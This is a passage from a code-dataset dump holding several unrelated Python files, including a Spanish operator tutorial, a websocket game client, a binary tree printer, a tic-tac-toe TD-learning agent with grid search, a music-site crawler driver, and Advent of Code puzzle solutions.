self.menu_sentencias()\r\n\r\n elif opcion == '4':\r\n print(\"*\" * 18 + \" OPERADOR LOGICO \" + \"*\" * 17)\r\n distancia = 400\r\n nomeroHermanos = 3\r\n sueldoPadres = 3000\r\n tieneBeneficio = False\r\n\r\n if (distancia > 1000 and nomeroHermanos > 2) or sueldoPadres < 2000:\r\n tieneBeneficio = True\r\n print(not tieneBeneficio)\r\n\r\n if (7 > 4) and (6 < 12):\r\n print(\"Verdad\")\r\n else:\r\n print(\"Es mentira...\")\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '5':\r\n print(\"*\" * 17 + \" OPERADOR TERNARIO \" + \"*\" * 17)\r\n \"\"\"\r\n String sexo;\r\n sexo = (10 > 20) ? 
\"Masculino\" : \"Femenino\"\r\n \"\"\"\r\n sexos = (\"Hombre\", \"Mujer\")\r\n posicion = True\r\n\r\n sexo = sexos[posicion] #Mujer\r\n print(sexo)\r\n\r\n sexo = sexos[not posicion] #Hombre\r\n print(sexo)\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '6':\r\n print(\"*\" * 22 + \" IF - IN \" + \"*\" * 22)\r\n print(\"-- Cursos --\")\r\n print(\"Matematicas - Biologia - Lenguaje- Ciencias\")\r\n curso = input(\"Ingrese el curso deseado: \")\r\n if curso in (\"Matematicas\", \"Biologia\", \"Lenguaje\", \"Ciencias\"):\r\n print(\"Curso {} seleccionado\".format(curso))\r\n else:\r\n print(\"No existe curso...\")\r\n\r\n input(\"\\nPresione una tecla para continuar...\"), os.system(\"cls\"), self.menu_sentencias()\r\n\r\n elif opcion == '7':\r\n pass\r\n\r\n\r\n\r\n\r\n","repo_name":"LeonardoArroba/S9---Tarea-N-2","sub_path":"Curso/sentencias.py","file_name":"sentencias.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43650832141","text":"from ursina import *\r\nimport websocket, json\r\nfrom objects import Player, Bug\r\nfrom sys import exit\r\n\r\nws = websocket.WebSocketApp(\"wss://ws.korrumzthegame.wtf\")\r\n\r\nplayers = []\r\nbugs = []\r\n\r\ndef run_multiplayer(player_me, leaderboard, discord_rpc):\r\n global players, bugs\r\n\r\n def on_open(ws):\r\n data = {\r\n \"event\": \"new player\",\r\n \"data\": {\r\n \"username\": player_me.username,\r\n \"x\": player_me.x,\r\n \"y\": player_me.y,\r\n \"canvasWidth\": 5000,\r\n \"canvasHeight\": 5000,\r\n \"imageNumber\": player_me.image_number\r\n }\r\n }\r\n\r\n data = json.dumps(data)\r\n ws.send(data)\r\n\r\n def on_message(ws, msg):\r\n msg = json.loads(msg)\r\n data = msg[\"data\"]\r\n p = None\r\n\r\n for player in players + [player_me]:\r\n if \"username\" in data and player.username == data[\"username\"]:\r\n p = player\r\n\r\n if msg[\"event\"] == \"new player\":\r\n players.append(Player(data[\"username\"], data[\"x\"], data[\"y\"], data[\"pullRequests\"], data[\"imageNumber\"]))\r\n discord_rpc.update()\r\n\r\n elif msg[\"event\"] == \"new username\":\r\n player_me.username = data[\"username\"]\r\n discord_rpc.update()\r\n\r\n elif msg[\"event\"] == \"new image\":\r\n player_me.image_number = data[\"imageNumber\"]\r\n discord_rpc.update()\r\n\r\n elif msg[\"event\"] == \"move\":\r\n p.position = (data[\"x\"], 5, data[\"y\"])\r\n if not p == player_me:\r\n p.username_object.position = (data[\"x\"], 10, data[\"y\"])\r\n\r\n elif msg[\"event\"] == \"new bug\":\r\n bugs.append(Bug(data[\"x\"], data[\"y\"], data[\"imageNumber\"]))\r\n\r\n elif msg[\"event\"] == \"pull request\":\r\n b = None\r\n\r\n for bug in bugs:\r\n if (bug.position, bug.image_number) == (Vec3(data[\"bug\"][\"x\"], 2, data[\"bug\"][\"y\"]), data[\"bug\"][\"imageNumber\"]):\r\n b = bug\r\n \r\n bugs.remove(b)\r\n destroy(b)\r\n p.pull_requests = data[\"pullRequests\"]\r\n\r\n discord_rpc.update()\r\n\r\n elif msg[\"event\"] == \"new gban\":\r\n if data[\"username\"] == player_me.username:\r\n ws.close()\r\n player_me.running = False\r\n discord_rpc.running = False\r\n\r\n elif msg[\"event\"] == \"player disconnected\":\r\n players.remove(p)\r\n destroy(p.username_object)\r\n destroy(p)\r\n\r\n discord_rpc.update()\r\n\r\n leaderboard.text = \"Pull requesty:\\n\\n\" + \"\\n\".join([f\"{player.username if not player == player_me else player.username + ' (ty)'} 
{player.pull_requests}\" for player in sorted(players + [player_me], reverse=True, key=lambda player: player.pull_requests)])\r\n leaderboard.create_background()\r\n\r\n ws.on_open = on_open\r\n ws.on_message = on_message\r\n ws.run_forever()\r\n","repo_name":"PoligonTeam/korrumzthegame3d","sub_path":"korrumz the game 3d/multiplayer.py","file_name":"multiplayer.py","file_ext":"py","file_size_in_byte":2986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43023897970","text":"from sys import stdin, setrecursionlimit\nimport queue\n\nsetrecursionlimit(10 ** 6)\n\n\n#Following is the structure used to represent the Binary Tree Node\nclass BinaryTreeNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n\ndef printLevelWise(root):\n # Your code goes here\n q=queue.Queue()\n q.put(root)\n while q.empty() is False:\n currNode=q.get()\n if currNode.left is None and currNode.right is None:\n print(currNode.data,':','L',':','-1',',','R',':','-1',sep='')\n elif currNode.left is None:\n print(currNode.data,':','L',':','-1',',','R',':',currNode.right.data,sep='')\n q.put(currNode.right)\n elif currNode.right is None:\n print(currNode.data,':','L',':',currNode.left.data,',','R',':','-1',sep='')\n q.put(currNode.left)\n else:\n print(currNode.data,':','L',':',currNode.left.data,',','R',':',currNode.right.data,sep='')\n q.put(currNode.left)\n q.put(currNode.right)\n \n\n\n#Taking level-order input using fast I/O method\ndef takeInput():\n levelOrder = list(map(int, stdin.readline().strip().split(\" \")))\n start = 0\n \n length = len(levelOrder)\n\n if length == 1 :\n return None\n \n root = BinaryTreeNode(levelOrder[start])\n start += 1\n\n q = queue.Queue()\n q.put(root)\n\n while not q.empty():\n currentNode = q.get()\n\n leftChild = levelOrder[start]\n start += 1\n\n if leftChild != -1:\n leftNode = BinaryTreeNode(leftChild)\n currentNode.left =leftNode\n q.put(leftNode)\n\n rightChild = levelOrder[start]\n start += 1\n\n if rightChild != -1:\n rightNode = BinaryTreeNode(rightChild)\n currentNode.right =rightNode\n q.put(rightNode)\n\n return root\n\n\n# Main\nroot = takeInput()\nprintLevelWise(root)\n","repo_name":"ss4621-dev/Coding-Ninjas---Data-Structures-and-Algorithms-in-Python","sub_path":"Binary Trees - 2/Print Levelwise.py","file_name":"Print Levelwise.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"42743513887","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport random\nimport time\nimport logging\nimport json\nfrom collections import defaultdict\nfrom itertools import product\nfrom multiprocessing import Pool\nfrom tempfile import NamedTemporaryFile\n\nimport pandas as pd\nimport click\nfrom tqdm import tqdm as _tqdm\ntqdm = _tqdm\n\nfrom gym_tictactoe.env import TicTacToeEnv, set_log_level_by, agent_by_mark,\\\n next_mark, check_game_status, after_action_state, O_REWARD, X_REWARD\nfrom human_agent import HumanAgent\nfrom base_agent import BaseAgent\n\n\nDEFAULT_VALUE = 0\nEPISODE_CNT = 17000\nBENCH_EPISODE_CNT = 3000\nMODEL_FILE = 'best_td_agent.dat'\nEPSILON = 0.08\nALPHA = 0.4\nCWD = os.path.dirname(os.path.abspath(__file__))\n\n\nst_values = {}\nst_visits = defaultdict(lambda: 0)\n\n\ndef reset_state_values():\n global st_values, st_visits\n st_values = {}\n st_visits = defaultdict(lambda: 0)\n\n\ndef set_state_value(state, value):\n st_visits[state] += 1\n 
st_values[state] = value\n\n\ndef best_val_indices(values, fn):\n best = fn(values)\n return [i for i, v in enumerate(values) if v == best]\n\n\nclass TDAgent(object):\n def __init__(self, mark, epsilon, alpha):\n self.mark = mark\n self.alpha = alpha\n self.epsilon = epsilon\n self.episode_rate = 1.0\n\n def act(self, state, ava_actions):\n return self.egreedy_policy(state, ava_actions)\n\n def egreedy_policy(self, state, ava_actions):\n \"\"\"Returns action by Epsilon greedy policy.\n\n Return random action with epsilon probability or best action.\n\n Args:\n state (tuple): Board status + mark\n ava_actions (list): Available actions\n\n Returns:\n int: Selected action.\n \"\"\"\n logging.debug(\"egreedy_policy for '{}'\".format(self.mark))\n e = random.random()\n if e < self.epsilon * self.episode_rate:\n logging.debug(\"Explore with eps {}\".format(self.epsilon))\n action = self.random_action(ava_actions)\n else:\n logging.debug(\"Exploit with eps {}\".format(self.epsilon))\n action = self.greedy_action(state, ava_actions)\n return action\n\n def random_action(self, ava_actions):\n return random.choice(ava_actions)\n\n def greedy_action(self, state, ava_actions):\n \"\"\"Return best action by current state value.\n\n Evaluate each action, select best one. Tie-breaking is random.\n\n Args:\n state (tuple): Board status + mark\n ava_actions (list): Available actions\n\n Returns:\n int: Selected action\n \"\"\"\n assert len(ava_actions) > 0\n\n ava_values = []\n for action in ava_actions:\n nstate = after_action_state(state, action)\n nval = self.ask_value(nstate)\n ava_values.append(nval)\n vcnt = st_visits[nstate]\n logging.debug(\" nstate {} val {:0.2f} visits {}\".\n format(nstate, nval, vcnt))\n\n # select most right action for 'O' or 'X'\n if self.mark == 'O':\n indices = best_val_indices(ava_values, max)\n else:\n indices = best_val_indices(ava_values, min)\n\n # tie breaking by random choice\n aidx = random.choice(indices)\n logging.debug(\"greedy_action mark {} ava_values {} indices {} aidx {}\".\n format(self.mark, ava_values, indices, aidx))\n\n action = ava_actions[aidx]\n\n return action\n\n def ask_value(self, state):\n \"\"\"Returns value of given state.\n\n If state is not exists, set it as default value.\n\n Args:\n state (tuple): State.\n\n Returns:\n float: Value of a state.\n \"\"\"\n if state not in st_values:\n logging.debug(\"ask_value - new state {}\".format(state))\n gstatus = check_game_status(state[0])\n val = DEFAULT_VALUE\n # win\n if gstatus > 0:\n val = O_REWARD if self.mark == 'O' else X_REWARD\n set_state_value(state, val)\n return st_values[state]\n\n def backup(self, state, nstate, reward):\n \"\"\"Backup value by difference and step size.\n\n Execute an action then backup Q by best value of next state.\n\n Args:\n state (tuple): Current state\n nstate (tuple): Next state\n reward (int): Immediate reward from action\n \"\"\"\n logging.debug(\"backup state {} nstate {} reward {}\".\n format(state, nstate, reward))\n\n val = self.ask_value(state)\n nval = self.ask_value(nstate)\n diff = nval - val\n val2 = val + self.alpha * diff\n\n logging.debug(\" value from {:0.2f} to {:0.2f}\".format(val, val2))\n set_state_value(state, val2)\n\n\n@click.group()\n@click.option('-v', '--verbose', count=True, help=\"Increase verbosity.\")\n@click.pass_context\ndef cli(ctx, verbose):\n global tqdm\n\n set_log_level_by(verbose)\n if verbose > 0:\n tqdm = lambda x: x # NOQA\n\n\n@cli.command(help=\"Learn and save the model.\")\n@click.option('-p', '--episode', 
\"max_episode\", default=EPISODE_CNT,\n show_default=True, help=\"Episode count.\")\n@click.option('-e', '--epsilon', \"epsilon\", default=EPSILON,\n show_default=True, help=\"Exploring factor.\")\n@click.option('-a', '--alpha', \"alpha\", default=ALPHA,\n show_default=True, help=\"Step size.\")\n@click.option('-f', '--save-file', default=MODEL_FILE, show_default=True,\n help=\"Save model data as file name.\")\ndef learn(max_episode, epsilon, alpha, save_file):\n _learn(max_episode, epsilon, alpha, save_file)\n\n\ndef _learn(max_episode, epsilon, alpha, save_file):\n \"\"\"Learn by episodes.\n\n Make two TD agent, and repeat self play for given episode count.\n Update state values as reward coming from the environment.\n\n Args:\n max_episode (int): Episode count.\n epsilon (float): Probability of exploration.\n alpha (float): Step size.\n save_file: File name to save result.\n \"\"\"\n reset_state_values()\n\n env = TicTacToeEnv()\n agents = [TDAgent('O', epsilon, alpha),\n TDAgent('X', epsilon, alpha)]\n\n start_mark = 'O'\n for i in tqdm(range(max_episode)):\n episode = i + 1\n env.show_episode(False, episode)\n\n # reset agent for new episode\n for agent in agents:\n agent.episode_rate = episode / float(max_episode)\n\n env.set_start_mark(start_mark)\n state = env.reset()\n _, mark = state\n done = False\n while not done:\n agent = agent_by_mark(agents, mark)\n ava_actions = env.available_actions()\n env.show_turn(False, mark)\n action = agent.act(state, ava_actions)\n\n # update (no rendering)\n nstate, reward, done, info = env.step(action)\n agent.backup(state, nstate, reward)\n\n if done:\n env.show_result(False, mark, reward)\n # set terminal state value\n set_state_value(state, reward)\n\n _, mark = state = nstate\n\n # rotate start\n start_mark = next_mark(start_mark)\n\n # save states\n save_model(save_file, max_episode, epsilon, alpha)\n\n\ndef save_model(save_file, max_episode, epsilon, alpha):\n with open(save_file, 'wt') as f:\n # write model info\n info = dict(type=\"td\", max_episode=max_episode, epsilon=epsilon,\n alpha=alpha)\n # write state values\n f.write('{}\\n'.format(json.dumps(info)))\n for state, value in st_values.items():\n vcnt = st_visits[state]\n f.write('{}\\t{:0.3f}\\t{}\\n'.format(state, value, vcnt))\n\n\ndef load_model(filename):\n with open(filename, 'rb') as f:\n # read model info\n info = json.loads(f.readline().decode('ascii'))\n for line in f:\n elms = line.decode('ascii').split('\\t')\n state = eval(elms[0])\n val = eval(elms[1])\n vcnt = eval(elms[2])\n st_values[state] = val\n st_visits[state] = vcnt\n return info\n\n\n@cli.command(help=\"Play with human.\")\n@click.option('-f', '--load-file', default=MODEL_FILE, show_default=True,\n help=\"Load file name.\")\n@click.option('-n', '--show-number', is_flag=True, default=False,\n show_default=True, help=\"Show location number when play.\")\ndef play(load_file, show_number):\n _play(load_file, HumanAgent('O'), show_number)\n\n\ndef _play(load_file, vs_agent, show_number):\n \"\"\"Play with learned model.\n\n Make TD agent and adversarial agnet to play with.\n Play and switch starting mark when the game finished.\n TD agent behave no exploring action while in play mode.\n\n Args:\n load_file (str):\n vs_agent (object): Enemy agent of TD agent.\n show_number (bool): Whether show grid number for visual hint.\n \"\"\"\n load_model(load_file)\n env = TicTacToeEnv(show_number=show_number)\n td_agent = TDAgent('X', 0, 0) # prevent exploring\n start_mark = 'O'\n agents = [vs_agent, td_agent]\n\n while 
True:\n # start agent rotation\n env.set_start_mark(start_mark)\n state = env.reset()\n _, mark = state\n done = False\n\n # show start board for human agent\n if mark == 'O':\n env.render(mode='human')\n\n while not done:\n agent = agent_by_mark(agents, mark)\n human = isinstance(agent, HumanAgent)\n\n env.show_turn(True, mark)\n ava_actions = env.available_actions()\n if human:\n action = agent.act(ava_actions)\n if action is None:\n sys.exit()\n else:\n action = agent.act(state, ava_actions)\n\n state, reward, done, info = env.step(action)\n\n env.render(mode='human')\n if done:\n env.show_result(True, mark, reward)\n break\n else:\n _, mark = state\n\n # rotation start\n start_mark = next_mark(start_mark)\n\n\n@cli.command(help=\"Learn and benchmark.\")\n@click.option('-p', '--learn-episode', \"max_episode\", default=EPISODE_CNT,\n show_default=True, help=\"Learn episode count.\")\n@click.option('-b', '--bench-episode', \"max_bench_episode\",\n default=BENCH_EPISODE_CNT, show_default=True, help=\"Bench \"\n \"episode count.\")\n@click.option('-e', '--epsilon', \"epsilon\", default=EPSILON,\n show_default=True, help=\"Exploring factor.\")\n@click.option('-a', '--alpha', \"alpha\", default=ALPHA,\n show_default=True, help=\"Step size.\")\n@click.option('-f', '--model-file', default=MODEL_FILE, show_default=True,\n help=\"Model data file name.\")\ndef learnbench(max_episode, max_bench_episode, epsilon, alpha, model_file):\n _learnbench(max_episode, max_bench_episode, epsilon, alpha, model_file)\n\n\ndef _learnbench(max_episode, max_bench_episode, epsilon, alpha, model_file,\n show=True):\n if show:\n print(\"Learning...\")\n _learn(max_episode, epsilon, alpha, model_file)\n if show:\n print(\"Benchmarking...\")\n return _bench(max_bench_episode, model_file, show)\n\n\n@cli.command(help=\"Benchmark agent with base agent.\")\n@click.option('-p', '--episode', \"max_episode\", default=BENCH_EPISODE_CNT,\n show_default=True, help=\"Episode count.\")\n@click.option('-f', '--model-file', default=MODEL_FILE, show_default=True,\n help=\"Model data file name.\")\ndef bench(model_file, max_episode):\n _bench(max_episode, model_file)\n\n\ndef _bench(max_episode, model_file, show_result=True):\n \"\"\"Benchmark given model.\n\n Args:\n max_episode (int): Episode count to benchmark.\n model_file (str): Learned model file name to benchmark.\n show_result (bool): Output result to stdout.\n\n Returns:\n (dict): Benchmark result.\n \"\"\"\n minfo = load_model(model_file)\n agents = [BaseAgent('O'), TDAgent('X', 0, 0)]\n show = False\n\n start_mark = 'O'\n env = TicTacToeEnv()\n env.set_start_mark(start_mark)\n\n episode = 0\n results = []\n for i in tqdm(range(max_episode)):\n env.set_start_mark(start_mark)\n state = env.reset()\n _, mark = state\n done = False\n while not done:\n agent = agent_by_mark(agents, mark)\n ava_actions = env.available_actions()\n action = agent.act(state, ava_actions)\n state, reward, done, info = env.step(action)\n if show:\n env.show_turn(True, mark)\n env.render(mode='human')\n\n if done:\n if show:\n env.show_result(True, mark, reward)\n results.append(reward)\n break\n else:\n _, mark = state\n\n # rotation start\n start_mark = next_mark(start_mark)\n episode += 1\n\n o_win = results.count(1)\n x_win = results.count(-1)\n draw = len(results) - o_win - x_win\n mfile = model_file.replace(CWD + os.sep, '')\n minfo.update(dict(base_win=o_win, td_win=x_win, draw=draw,\n model_file=mfile))\n result = json.dumps(minfo)\n\n if show_result:\n print(result)\n return 
result\n\n\n@cli.command(help=\"Learn and play with human.\")\n@click.option('-p', '--episode', \"max_episode\", default=EPISODE_CNT,\n              show_default=True, help=\"Episode count.\")\n@click.option('-e', '--epsilon', \"epsilon\", default=EPSILON,\n              show_default=True, help=\"Exploring factor.\")\n@click.option('-a', '--alpha', \"alpha\", default=ALPHA,\n              show_default=True, help=\"Step size.\")\n@click.option('-f', '--model-file', default=MODEL_FILE, show_default=True,\n              help=\"Model file name.\")\n@click.option('-n', '--show-number', is_flag=True, default=False,\n              show_default=True, help=\"Show location numbers during play.\")\ndef learnplay(max_episode, epsilon, alpha, model_file, show_number):\n    _learn(max_episode, epsilon, alpha, model_file)\n    _play(model_file, HumanAgent('O'), show_number)\n\n\n@cli.command(help=\"Grid search hyper-parameters.\")\n@click.option('-q', '--quality', type=click.Choice(['high', 'mid', 'low']),\n              default='mid', show_default=True, help=\"Grid search\"\n              \" quality.\")\n@click.option('-r', '--reproduce-test', \"rtest_cnt\", default=3,\n              show_default=True, help=\"Reproducibility test count.\")\ndef gridsearch(quality, rtest_cnt):\n    \"\"\"Find and output best hyper-parameters.\n\n    Grid search consists of two phases:\n    1. Select the best 10 candidate parameter combinations.\n    2. Carry out reproducibility tests and output the top 5 parameters.\n\n    Args:\n        quality (str): Select preset of parameter combination. High quality\n            means more granularity in parameter space.\n        rtest_cnt (int): Reproduce test count\n    \"\"\"\n    st = time.time()\n    _gridsearch_candidate(quality)\n    _gridsearch_reproduce(rtest_cnt)\n    print(\"Finished in {:0.2f} seconds\".format(time.time() - st))\n\n\ndef _gridsearch_reproduce(rtest_cnt):\n    \"\"\"Refine parameter combinations by reproduce tests, and output the best 5.\n\n    A reproduce test is a learn & bench process for each parameter combination.\n\n    1. Select top 10 parameters from previous step.\n    2. Execute reproduce test.\n    3. Sort by lose rate.\n    4. Output best 5 parameters.\n\n    Args:\n        rtest_cnt (int): Reproduce test count\n\n    Todo:\n        Apply multiprocessor worker\n    \"\"\"\n    print(\"Reproducibility test.\")\n    with open(os.path.join(CWD, 'gsmodels/result.json'), 'rt') as fr:\n        df = pd.DataFrame([json.loads(line) for line in fr])\n    top10_df = df.sort_values(['base_win', 'max_episode'])[:10]\n\n    index = []\n    vals = []\n    # for each candidate\n    pbar = _tqdm(total=len(top10_df) * rtest_cnt)\n    for idx, row in top10_df.iterrows():\n        index.append(idx)\n        base_win_sum = 0\n        total_play = 0\n        # bench repeatedly\n        for i in range(rtest_cnt):\n            pbar.update()\n            learn_episode = row.max_episode\n            epsilon = row.epsilon\n            alpha = row.alpha\n            with NamedTemporaryFile() as tmp:\n                res = _learnbench(learn_episode, BENCH_EPISODE_CNT, epsilon,\n                                  alpha, tmp.name, False)\n                res = json.loads(res)\n                base_win_sum += res['base_win']\n                total_play += BENCH_EPISODE_CNT\n        lose_pct = float(base_win_sum) / rtest_cnt / total_play * 100\n        vals.append(round(lose_pct, 2))\n\n    top10_df['lose_pct'] = pd.Series(vals, index=index)\n\n    df = top10_df.sort_values(['lose_pct', 'max_episode']).reset_index()[:5]\n    print(df[['lose_pct', 'max_episode', 'alpha', 'epsilon', 'model_file']])\n\n\ndef _gridsearch_candidate(quality):\n    \"\"\"Select best hyper-parameter candidates by grid search.\n\n    1. Generate parameter combinations by taking the product of the parameter spaces.\n    2. Spawn processors to learn & bench each combination.\n    3. 
Wait and write the results to a file.\n\n    Args:\n        quality (str): Choice among 'high', 'mid', 'low'\n\n    Todo:\n        Progress bar estimation is not even.\n    \"\"\"\n    # disable sub-process's progressbar\n    global tqdm\n    tqdm = lambda x: x  # NOQA\n\n    if quality == 'high':\n        # high\n        epsilons = [e * 0.01 for e in range(8, 25, 2)]\n        alphas = [a * 0.1 for a in range(2, 8)]\n        episodes = [e for e in range(8000, 31000, 3000)]\n    elif quality == 'mid':\n        # mid\n        epsilons = [e * 0.01 for e in range(10, 20, 5)]\n        alphas = [a * 0.1 for a in range(3, 7)]\n        episodes = [e for e in range(10000, 30000, 5000)]\n    else:\n        # low\n        epsilons = [e * 0.01 for e in range(9, 13, 2)]\n        alphas = [a * 0.1 for a in range(4, 6)]\n        episodes = [e for e in range(10000, 25000, 10000)]\n\n    alphas = [round(a, 2) for a in alphas]\n    _args = list(product(episodes, epsilons, alphas))\n    args = []\n    for i, arg in enumerate(_args):\n        arg = list(arg)\n        arg.insert(1, BENCH_EPISODE_CNT)  # bench episode count\n        arg.append(os.path.join(CWD, 'gsmodels/model_{:03d}.dat'.format(i)))\n        arg.append(False)  # suppress print\n        args.append(arg)  # model file name\n    prev_left = total = len(args)\n\n    print(\"Grid search for {} parameter combinations.\".format(total))\n    pbar = _tqdm(total=total)\n    pool = Pool()\n    result = pool.starmap_async(_learnbench, args)\n    while True:\n        if result.ready():\n            break\n        if prev_left != result._number_left:\n            ucnt = prev_left - result._number_left\n            pbar.update(ucnt)\n            prev_left = result._number_left\n        time.sleep(1)\n\n    ucnt = prev_left - result._number_left\n    pbar.update(ucnt)\n    pbar.close()\n\n    with open(os.path.join(CWD, 'gsmodels/result.json'), 'wt') as f:\n        for r in result.get():\n            f.write('{}\\n'.format(r))\n\n\nif __name__ == '__main__':\n    cli()\n","repo_name":"haje01/gym-tictactoe","sub_path":"examples/td_agent.py","file_name":"td_agent.py","file_ext":"py","file_size_in_byte":19004,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"21"} +{"seq_id":"42627332963","text":"from utils import get_top100_list\nfrom utils.melon_crawler import MelonCrawler\n\n\n\nif __name__ == '__main__':\n    crawler = MelonCrawler()\n    # q = input('Enter a song title to search for: ')\n    # search_song_list = crawler.search_song(q)\n\n\n\n################ top100 list ################\n\n    # result = get_top100_list()\n    # for i in result:\n    #     print(i)\n\n\n\n################ song search ################\n\n    # song_list = crawler.search_song('기대해')\n    # song = song_list[0]\n\n    # print(song)\n    # print(song.title)\n    # print(song.album)\n\n    # print(song._lyrics, ': song._lyrics is None' )\n    # # print(song.lyrics)\n    #\n    # print(song._producers, ': song._producers is None' )\n    # print(song.producers)\n\n\n\n################ artist search ################\n\n    # Attempt 1\n    # # search_artist() # -> there is a part inside that calls Artist.\n    # when search_artist is called and the instance-creating part\n    # 'artist = Artist(~)' exists inside it, an 'Artist undefined' error occurs\n\n    # Attempt 2\n    # Artist.get_detail() # arguments need to be passed in, but there is no way to do so.\n\n    # Attempt 3\n    # artist_list = Artist('아이유') # Artist takes a huge number of arguments; passing only '아이유' is just a search.\n    # Artist.get_detail(artist_list) # and the Artist arguments are returned above precisely to avoid doing this\n\n    # Attempt 4 (success)\n    artist_list = crawler.search_artist('아이유')\n    # artist_list = crawler.search_artist('아이유악대')\n    # artist_list = crawler.search_artist('걸스데이')\n    # artist_list = crawler.search_artist('레드벨벳')\n\n\n#### 1) Artist search ####\n\n    for i in artist_list:\n        print(i)\n\n\n\n\n#### 2) The artist's songs ####\n\n    # artist = artist_list[0]\n    # result = artist.get_song()\n    # for i in result:\n    #     print(i)\n\n\n\n#### 3) Artist details ####\n\n    
# artist = artist_list[0]\n    # artist.get_detail()\n\n\n\n\n\n#### Like the assignment guide, I first just took a plain list,\n#### but it was too much hassle, so I did it my own way.\n#### 1) Artist search ####\n# for i in artist_list:\n#     print(i)\n# the dictionary output was too ugly to read, so I changed it to the version below\n\n# for i in artist_list:\n#     for j in i.keys():\n#         print(f'{j}: {i.get(j)}')\n#     print('')\n","repo_name":"smallbee3/Crawler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19648107322","text":"import re \nfrom functools import lru_cache\nfrom collections import deque \nclass Valve:\n    def __init__(self, data):\n        self.name = data[0]\n        self.flow_rate = int(data[1])\n        self.connected_valves = data[2:]\n        self.is_open = False\n    \n    def __repr__(self) -> str:\n        return f'Name: {self.name}, Flow: {self.flow_rate}, Open: {self.is_open}'\n    \n    def __str__(self) -> str:\n        return self.__repr__()\n\n\nclass ValveGraph:\n    #Do highest valves first\n\n    def __init__(self, data):\n        self.valve_connections: dict[Valve, list[Valve]] = dict()\n        for datum in data:\n            valve = Valve(datum)\n            self.valve_connections[valve] = valve.connected_valves\n        self.name_to_valve = { valve.name : valve for valve in self.valve_connections.keys()}\n        self.valve_flow_rates = {v : v.flow_rate for v in self.valve_connections.keys()}\n\n    @lru_cache(maxsize=None)\n    def time_to_open_valve(self, v0, v1):\n        #Perform breadth first search\n        queue = deque([[v0]])\n        visited = set()\n\n        if v0 == v1:\n            return 0\n\n        while queue:\n            path = queue.popleft()\n            node = path[-1]\n\n            if node not in visited:\n                connected = node.connected_valves\n\n                for conn_valve in connected:\n                    new_path = list(path)\n                    new_path.append(self.name_to_valve[conn_valve])\n                    queue.append(new_path)\n\n                    if(conn_valve == v1.name):\n                        return len(new_path) \n\n                visited.add(node)\n        return None\n\n    def get_best_flow_rate(self, minutes: int):\n        #get all paths and then join all disjoint sets\n        paths = list()\n        max_path = {}\n        max_flow = 0\n        current_valve = self.name_to_valve[\"AA\"]\n        valves = [valve[0] for valve in self.valve_flow_rates.items() if valve[1] > 0]\n        q = deque([([current_valve], minutes, {})])\n        \n        while q:\n            path, time, valve_open_time = q.pop()\n            if time <= 0 or len(path) == len(valves) + 1:\n                paths.append([valve_open_time, sum(map(lambda x: x[0].flow_rate * max(x[1], 0), valve_open_time.items()))])\n            else:\n                for valve in valves:\n                    if valve not in valve_open_time.keys():\n                        time_left = time - self.time_to_open_valve(path[-1], valve) \n                        new_valve_open_time = dict(valve_open_time)\n                        new_valve_open_time[valve] = time_left\n                        q.append((path + [valve], time_left, new_valve_open_time))\n\n        print(\"got all paths\")\n        #sort by flow\n        paths.sort(key=lambda p: p[1], reverse=True)\n        for valve_path_one, flow_one in paths:\n            if(flow_one + paths[0][1] < max_flow):\n                return max_flow\n            for valve_path_two, flow_two in paths:\n                total_flow = flow_one + flow_two\n                if(total_flow < max_flow):\n                    break\n                if(valve_path_one.keys().isdisjoint(valve_path_two.keys()) and total_flow > max_flow):\n                    max_flow = total_flow\n        return max_flow #make sure the best total is returned when the early exit above is never taken\n        \n    def flow_per_minute(self, open_valves):\n        flow_released = 0\n        for valve in open_valves:\n            flow_released += valve.flow_rate\n        \n        return flow_released\n    \nwith open(\"Day16\\Data.txt\") as f:\n    valves = [re.findall(r'[A-Z]{2}|[0-9]+', line) for line in f.read().splitlines()]\n\ngraph = ValveGraph(valves)\nmax_flow = graph.get_best_flow_rate(26)\nprint(f\"Answer to Q2: 
{max_flow}\")","repo_name":"Kodyena/advent-of-code-2022","sub_path":"Day16/Codeb.py","file_name":"Codeb.py","file_ext":"py","file_size_in_byte":3627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8277359131","text":"position = 0\nskip_size = 0\n\nstring = range(0, 256)\nlengths = [14,58,0,116,179,16,1,104,2,254,167,86,255,55,122,244]\n#string = range(0, 5)\n#lengths = [3, 4, 1, 5]\n\nfor l in lengths:\n sublist = []\n starting_position = position\n for i in xrange(l):\n sublist.append(string[position])\n position = (position + 1) % len(string)\n\n sublist.reverse()\n\n position = starting_position\n for i in xrange(l):\n string[position] = sublist[i]\n position = (position + 1) % len(string)\n\n position = (position + skip_size) % len(string)\n skip_size += 1\n\nprint(\"Multiplying first two numbers, %d * %d = %d\" % (string[0], string[1], string[0] * string[1]))\n","repo_name":"mch/advent-of-code","sub_path":"day-10.py","file_name":"day-10.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34217704233","text":"import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nbr = '../results/WMT18_Results/'\nbdf = pd.read_csv(br + 'BLEU_scores.tsv', sep='\\t')\nedf = pd.read_csv(br + 'scores_almost.tsv', sep='\\t')\n\nbz = bdf.columns.to_list()\nez = edf.columns.to_list()\n\nassert bz[:3] == ez[:3], \"First 2 elements must be same in both lists\"\nassert bz[-1] == ez[-1], \"Last element must be same in both lists\"\n\nfin = bz[:2]\nfin += bz[2:-1]\nfin += ez[2:-1]\nfin += 